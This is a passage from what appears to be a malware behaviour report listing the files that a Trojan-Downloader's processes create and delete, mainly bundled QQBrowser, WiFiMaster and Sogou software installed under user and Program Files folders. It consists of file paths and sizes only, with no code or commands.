%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQBrowser\F1Assistant.dll (19686 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\zh-CN.pak (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\9.3.7078.400.manifest (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\en-US.pak (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libexif.dll (3170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\license.txt (17 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\locales\en-US.pak (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\natives_blob_.bin (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\QQBrowserLiveup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PrScrn.dll (9405 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\d3dcompiler_47.dll (23811 bytes)
%Documents and Settings%\%current user%\Application Data\QB\PrScrn.dll (7345 bytes)
%Documents and Settings%\%current user%\Application Data\QB\uninst.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\extensions\commenExtension.crx (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\natives_blob.bin (1720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ExportFavHtml.dll (5607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\pepflashplayer.dll (134257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml (4 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\snapshot_blob_.bin (3073 bytes)
%Documents and Settings%\%current user%\Application Data\QB\setup.log (205 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\nsis_skin.gt (47 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libGLESv2.dll (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\xaml\PicCheckDialog.xaml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbghelp.dll (10210 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\i386\tsqbdrv.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\webp\WebpDecodeFilter.dll (1537 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\switch_core (14 bytes)
%Documents and Settings%\%current user%\Application Data\QB\QBUtils.dll (19686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Assistant.dll (25466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libGLESv2.dll (14287 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\compat.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbgeng.dll (26869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\MacroConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QRCode.dll (302 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}.qrx (191 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\natives_blob.bin (2321 bytes)
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe (4545 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}.qrx (673 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Application Data\QB\BugReport.exe (2321 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\TsQBDrvDll.dll (601 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_200_percent.pak (12287 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\dbghelper\dbgeng.dll (24822 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\F1Frame.dll (30618 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\dbghelper\dbghelp.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\service\TsService.exe.new (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qqbrowser.exe (6962 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\CustomerJoinPlan.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\switch_core (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\uninst.exe (4018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_child.dll (343608 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\compat.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\Downloader.dll (10381 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libEGL.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\PicCheckDialog.xaml (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\9.3.7078.400.manifest (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\qqtrack.xml (5 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qbroker\qbroker.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\i386\tsqbdrv.sys (2527 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp\WebpDecodeFilter.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\ClearDialog.xaml (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\chrome_100_percent.pak (7971 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\tsurllib.dat (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\qqtrack.xml (5 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\qqbrowser.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\navi.ico (104 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\driver\amd64\tsqbdrv.sys (601 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\libexif.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\QBSafe.dll (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\snapshot_blob.bin (1795 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\QBSafe.dll (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_100_percent.pak (1633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\compat.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome.dll (509544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\compat.xml (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\QQ浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\Config.xml (624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_100_percent.pak (7386 bytes)
%Documents and Settings%\%current user%\Application Data\QB\app.ico (284 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\BugReport.exe (2321 bytes)
%Documents and Settings%\%current user%\Application Data\QB\QQ浏览器.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\F1Assistant.dll (19686 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\TsQBDrvDll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UserPinnedTemp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\i386 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\zh-CN.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\switch_core (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\amd64\tsqbdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\tsurllib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb\en-US.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\resources.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\Default\Config Bookmarks (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker\qbroker.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Frame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ModuleDll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\QBInstaller.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\InformationBox.xaml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QQBrowserLiveup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\nsis_skin.gt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker\qbroker64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\icudtl.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb\zh-CN.pak (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_elf.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\navi.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\History (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\service (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_200_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\d3dcompiler_47.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\qb (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libEGL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\UserPinnedTemp\QQ浏览器.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\BugReport.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\extensions\commenExtension.crx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_200_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\tssafeedit.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\9.3.7078.400.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales\en-US.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libexif.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PrScrn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\amd64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\natives_blob.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ExportFavHtml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbghelp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\webp\WebpDecodeFilter.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\switch_core (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Assistant.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libGLESv2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbgeng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\compat.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QRCode.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\Default (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}.qrx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\Config.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\service\TsService.exe.new (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qqbrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\CustomerJoinPlan.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_child.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\Downloader.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\PicCheckDialog.xaml (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\qqtrack.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\i386\tsqbdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\ClearDialog.xaml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\navi.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\webp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\snapshot_blob.bin (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}_1\QBSafe.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qb_100_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\compat.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\MacroConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\extensions (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_100_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qbroker (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\pepflashplayer.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\BugReport.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\ScreenDef (0 bytes)

The process WiFi-2175.exe:664 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db (18929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\继续使用 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\完成按钮 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\点.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\自定义.png (984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu6.tmp (730245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\完成按钮 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\继续使用 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选 点击.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp\SetupPlugin.dll (131925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\取消.png (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\取消 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\icon.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\InstallPackages3.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp\FindProcDLL.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装不可点击.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\InstallPackages2.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\最小化 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装 未点击.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一键修复-正常.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\UninstallPackages.xml (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\关闭 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\进度条.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\确定卸载 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线支持-经过.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg1.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg3.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一键修复-经过.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选 未点击.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\取消 点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\最小化 点击.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db-journal (115866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn2.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn1.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\勾选-点击_灰.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\关闭点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\确定卸载 未点击.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\背景图.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\BrowseWnd.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn1_browse.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\bg2.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线支持-正常.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\专家在线支持-按下.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\一键修复-按下.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\进度条背景层.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\btn2_browse.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WiFiMasterSetup\res\快速安装 点击.png (4 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\WiFiMaster\LocalConfigure.db-journal (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)

The process BrowserProtect18.exe:2432 makes changes in the file system.
The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\qbwup.imtt.qq[1] (0 bytes)

The process QQBrowserOTA.exe:2012 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOCommon.dll (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\InstallHelper.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn16.tmp (78435 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\SSO\SSOPlatform.dll (48241 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\InstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss17.tmp\System.dll (0 bytes)

The process ExternalApp.exe:1112 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_stable_list_item.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\button.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\continuebtn.png (819 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\edit.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\option_bk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\white.png (163 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\9.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\beginexp.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\confirm_dlg.xml (2 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_nor.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\hover̬.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\uninstall_dwn.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\ËÑË÷ɾ³ý.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\USB.png (7 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\radio.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_hot.png (350 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\AdbWinUsbApi.dll (2628 bytes)
%Program Files%\SogouSoftware\3.1.13.79\IEHint.dll (10252 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\newbutton.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_nor.png (1 bytes)
%Program Files%\SogouSoftware\update\USBDT.dll (14494 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\5.png (18 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\aapt.exe (22008 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_right.png (1 bytes)
%Program Files%\SogouSoftware\update\UpdateService.exe (6928 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\follow_tip.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\grin.png (24 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst32\DrvInst_x86.exe (10321 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\3.0.0.0\apktool.ini (44 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\combo_mask.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\DrvInst64\DrvInst_x64.exe (10382 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\logo3636.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\menu.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\System.dll (11 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\update_list_dlg_otherfont.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\dlgClose_dwn.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\ScrollBar\scrollH.png (909 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\search_delete.png (17 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\info.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\SogouPhoneService.exe (22004 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress_bg.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\upgrade_beta_list_item.xml (5 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\scroll_bk.png (3 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\update_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\ins_progress_bk.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\recommend_hov.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\closebtn_hover.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\dlg_feedback.xml (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\skin\PNG\recommend_selected.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\info_icon.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\beginbtn.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\tips_down.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\smallbtn.png (1 bytes)
%Program Files%\SogouSoftware\3.1.13.79\ApkTool\extheme\ApkTool\progress_bk.png (952 bytes)
